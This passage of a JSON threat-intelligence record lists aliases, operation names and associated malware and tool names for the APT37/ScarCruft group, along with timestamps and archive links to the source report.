"APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434623, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.pdf", "text": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.txt", "img": "https://archive.orkl.eu/f5a3423d495388aadb8cb22e1e044a2042f956db.jpg" } }